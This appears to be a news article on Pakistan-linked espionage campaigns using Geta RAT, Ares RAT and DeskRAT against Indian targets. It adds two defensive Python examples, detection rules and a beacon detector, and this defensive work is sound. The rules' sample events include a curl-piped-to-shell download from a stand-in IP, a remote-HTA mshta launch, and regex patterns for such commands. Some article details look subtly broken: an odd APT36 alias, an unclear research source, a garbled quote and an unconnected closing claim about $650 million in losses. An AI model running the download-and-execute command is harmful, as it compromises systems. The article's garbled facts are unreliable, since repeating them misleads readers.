- Pakistan-backed hacking groups have run several cyber-espionage campaigns against Indian government and military institutions.
- The attackers used Geta RAT, Ares RAT and DeskRAT to access computers running Windows and Linux, steal sensitive information and keep an open connection for future access.
- Information security experts warn that these actors keep refining their techniques to stay anonymous and avoid detection.

Cyber-espionage groups connected to Pakistan have significantly increased the number of attacks against a wide range of important Indian organizations, including government agencies, defence contractors, and strategic infrastructure, through the use of sophisticated malware able to function on both Windows and Linux operating systems.
Research on these activities indicates that two Pakistan-based threat actors affiliated with the SideCopy and APT36 (Dong Jiang) campaigns have been responsible for this activity since approximately 2019, and that SideCopy is considered in some way an extension of APT36.
Hackers Refine Espionage Tactics with Cross-Platform Tools
According to Aditya K. Sood, who serves as Aryaka’s VP for Security Engineering & AI Strategy, “The ever-evolving threat landscape continues to develop around campaigns like these.” Sood went on to say, “Espionage isn’t being reinvented; it is simply being further developed.”
These groups have expanded their reach by targeting several operating systems at once; they use memory-resident techniques that leave little or no evidence on the target computer, and they are experimenting with new malware delivery methods to defeat security products.
Sood said, “In doing so, he is able to expand the cross-platform footprint and develop memory resident methods, and explore new delivery methods for the criminal ecosystem that remains below the noise floor, while focusing on their strategic objectives.”
Phishing emails are the first stage of the campaign. They carry either an attachment or a link that downloads from the attackers' infrastructure. The initial infection uses Windows shortcuts (LNK files), ELF binaries for Linux systems, and PowerPoint Add-In files to launch a multi-stage malware deployment.
Three Powerful RATs Steal Data Across Operating Systems
The campaigns deploy three distinct remote access trojans (RATs): Geta RAT, Ares RAT, and DeskRAT. Each malware family provides persistent remote access and collects sensitive information from infected machines.
Geta RAT attacks Windows systems through a sophisticated infection chain. A malicious LNK file triggers mshta.exe to execute an HTML Application file hosted on compromised legitimate domains. The HTA file uses JavaScript to decrypt an embedded DLL, which then processes additional data to create a decoy PDF document.
The malware (Geta RAT) first identifies any installed security products based on the configuration of the machine and scans for ways to hide from these products to evade detection. CISAC secure research centers documented this attack chain (2025-12-30).
After establishing itself on a system, Geta RAT is capable of a large number of malicious actions, including:
- Collect detailed system information and enumerate running processes
- Terminate specific processes and list installed applications
- Harvest stored credentials and capture screenshots
- Monitor and replace clipboard contents with attacker-controlled data
- Execute arbitrary shell commands and perform file operations
- Extract data from connected USB devices
The hackers run a parallel campaign targeting Linux environments. This variant uses a Go-based binary as the entry point. The binary downloads a shell script from an external server, which then deploys the Python-based Ares RAT.
This malware mirrors Geta RAT’s capabilities and can execute a wide range of commands to steal sensitive data and run Python scripts or commands from the threat actor.
Aryaka researchers also observed the deployment of DeskRAT, another Golang-based malware. The hackers deliver this tool through malicious PowerPoint Add-In files.
These files contain embedded macros that establish outbound communication with remote servers to fetch the malware. Security firms Sekoia and QiAnXin XLab first documented APT36’s use of DeskRAT in October 2025.
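The three delivery chains described above (LNK launching mshta.exe with a remote HTA, a Go loader piping a downloaded script into a shell and then starting a Python RAT from a temp directory, and a PowerPoint add-in reaching out to an external server) each leave a distinct footprint in process and network telemetry. The following is an added example of how a defender might encode those footprints as simple detection rules; it is not code from the article or from Aryaka, and the event schema, hostnames, paths, URLs and IP addresses are constructed placeholders (the IPs use RFC 5737 documentation ranges to stand in for external servers).

```python
import ipaddress
import re

# Constructed sample telemetry in a Sysmon/auditd-like shape. The field names
# are an assumption of this example, not a real product schema; all values are
# placeholders and none come from the campaign the article describes.
EVENTS = [
    {"host": "win-01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://compromised-site.invalid/docs/brief.hta"},
    {"host": "win-01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\a\local-tool.hta"},          # local HTA: not flagged
    {"host": "lin-07", "type": "process", "parent": "/tmp/update",
     "image": "/bin/sh",
     "cmdline": 'sh -c "curl -s http://198.51.100.23/s.sh | sh"'},
    {"host": "lin-07", "type": "process", "parent": "/bin/sh",
     "image": "/usr/bin/python3", "cmdline": "python3 /tmp/.cache/agent.py"},
    {"host": "win-02", "type": "network", "dest_ip": "203.0.113.9", "dest_port": 443,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"},
    {"host": "win-02", "type": "network", "dest_ip": "10.0.0.5", "dest_port": 445,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"},  # internal
]

# Private, loopback and link-local ranges; anything else is treated as external.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def basename(path):
    # Works for both Windows and POSIX paths.
    return re.split(r"[\\/]", path)[-1].lower()


# Each rule maps one stage of a chain described in the article to a predicate.
def mshta_remote_hta(e):
    # LNK -> explorer.exe launches mshta.exe with an HTA fetched over HTTP(S)
    return (e["type"] == "process" and basename(e["image"]) == "mshta.exe"
            and basename(e["parent"]) == "explorer.exe"
            and re.search(r"https?://\S+\.hta\b", e["cmdline"], re.I) is not None)


def download_piped_to_shell(e):
    # Loader downloads a shell script and pipes it straight into sh
    return (e["type"] == "process" and basename(e["image"]) in ("sh", "bash", "dash")
            and re.search(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", e["cmdline"]) is not None)


def python_from_temp(e):
    # Python-based RAT started from a world-writable temp location
    return (e["type"] == "process" and basename(e["image"]).startswith("python")
            and re.search(r"(^|\s)/(tmp|var/tmp|dev/shm)/", e["cmdline"]) is not None)


def office_outbound(e):
    # PowerPoint itself reaching an external server (add-in macro fetching a payload)
    return (e["type"] == "network" and basename(e["image"]) == "powerpnt.exe"
            and is_external(e["dest_ip"]))


RULES = [
    ("geta_rat_mshta_remote_hta", mshta_remote_hta),
    ("ares_rat_download_to_shell", download_piped_to_shell),
    ("ares_rat_python_from_temp", python_from_temp),
    ("deskrat_powerpoint_outbound", office_outbound),
]


def run_rules(events, rules=RULES):
    """Return one finding per (event, matching rule) pair."""
    findings = []
    for e in events:
        for name, pred in rules:
            if pred(e):
                findings.append({"host": e["host"], "rule": name, "event": e})
    return findings


if __name__ == "__main__":
    for f in run_rules(EVENTS):
        print(f"{f['host']}: {f['rule']}")
```

The rules deliberately key on parent/child relationships and command-line shape rather than on file hashes or domain names, since the article notes the actors rotate delivery methods and use compromised legitimate domains; a local HTA or an internal SMB connection from PowerPoint is left unflagged so the rules stay usable in an environment where those are routine.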
Defense Sector Faces Ongoing Strategic Threat
The campaign targets extend beyond just defense contractors. Policy research institutions, critical infrastructure operators, and defense-adjacent organizations all face exposure. The hackers use defense-themed lures, impersonate official documents, and exploit regionally trusted infrastructure to gain victims’ confidence.
These campaigns exemplify a capable and well-funded espionage actor deliberately targeting India's defence, government and strategic sectors with defence-related lures, falsified government documents and infrastructure that is trusted throughout the region.
Aryaka's researchers concluded from their analysis that the actors operate within an established, trusted ecosystem, which gives them a significant opportunity to remain undetected for long periods.
Organizations supporting national security initiatives will have to prepare for sustained threat activity from sophisticated attackers whose strategic agendas are clear.
According to the company, “Desk RAT’s deployment along with Geta RATs and AresRATs reflects this evolution of toolkits, focused on stealth, persistence, and long-term access.”
Experts in information security recommend that organizations within the defence industry increase monitoring for anomalous network activity, particularly to external servers.
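One concrete form of the monitoring recommended above is to look for hosts that contact the same external server at near-regular intervals, which is how a RAT keeping "an open connection for future access" typically behaves. The following beacon detector is an added example, not code from the article or from Aryaka; its flow records are constructed, the destination addresses are RFC 5737 documentation ranges standing in for external servers, and the thresholds (at least six connections, coefficient of variation of the inter-connection gaps at most 0.2) are assumptions to be tuned per environment.

```python
import statistics
from collections import defaultdict


def _make_flows():
    """Constructed flow records: (host, destination IP, connect time in seconds)."""
    flows = []
    jitter = [0, 1, -1, 2, 0, -2, 1, 0, 1, -1, 0, 2]
    # host-a checks in with one external server roughly every 60 s (beacon-like)
    for i, j in enumerate(jitter):
        flows.append(("host-a", "203.0.113.9", 60 * i + j))
    # host-a also talks to an internal file server at irregular times
    for t in (0, 5, 300, 310, 900, 2000, 2004):
        flows.append(("host-a", "10.0.0.5", t))
    # host-b touches another external address only three times (too few to judge)
    for t in (0, 120, 240):
        flows.append(("host-b", "198.51.100.7", t))
    return flows


FLOWS = _make_flows()

# Simplified RFC 1918 / loopback / link-local check on dotted-quad strings.
INTERNAL_PREFIXES = ("10.", "192.168.", "127.", "169.254.") + tuple(
    f"172.{n}." for n in range(16, 32))


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIXES)


def find_beacons(flows, min_connections=6, max_cv=0.2):
    """Group flows per (host, destination) and flag external destinations that are
    contacted at near-regular intervals. cv = pstdev(intervals) / mean(intervals);
    a low cv means the gaps between connections are nearly constant."""
    by_pair = defaultdict(list)
    for host, dest, ts in flows:
        by_pair[(host, dest)].append(ts)

    findings = []
    for (host, dest), times in by_pair.items():
        if is_internal(dest) or len(times) < min_connections:
            continue
        times.sort()
        intervals = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(intervals)
        if mean <= 0:
            continue
        cv = statistics.pstdev(intervals) / mean
        if cv <= max_cv:
            findings.append({"host": host, "dest": dest, "connections": len(times),
                             "mean_interval": round(mean, 1), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(FLOWS):
        print(f)
```

In practice the same grouping would be run over proxy, NetFlow or EDR network events, and the `min_connections` floor matters: with only a handful of connections almost any destination looks periodic, so short series are skipped rather than scored.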
Even the best defenses fail once data is stolen and sold on dark web markets. These crimes have cost Indian citizens over $650 million, underscoring the need for stronger law enforcement, not just technical controls.